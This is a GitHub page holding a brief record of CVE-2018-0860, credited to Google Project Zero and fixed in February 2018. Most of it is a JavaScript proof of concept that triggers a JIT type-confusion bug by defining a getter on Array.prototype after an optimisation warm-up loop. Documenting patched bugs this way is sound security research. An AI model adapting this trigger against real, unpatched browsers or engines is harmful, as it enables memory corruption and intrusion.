Skip to content

Latest commit

 

History

History
32 lines (23 loc) · 667 Bytes

CVE-2018-0860.md

File metadata and controls

32 lines (23 loc) · 667 Bytes
Raw

CVE-2018-0860

  • Fix: Feb 2018
  • Credit: lokihardt of Google Project Zero

PoC

function opt() {
    let arr = [];
    return arr['x'];
}

function main() {
    let arr = [1.1, 2.2, 3.3];
    for (let i = 0; i < 0x10000; i++) {
        opt();
    }

    Array.prototype.__defineGetter__('x', Object.prototype.valueOf);

    print(opt());
}

main();

Reference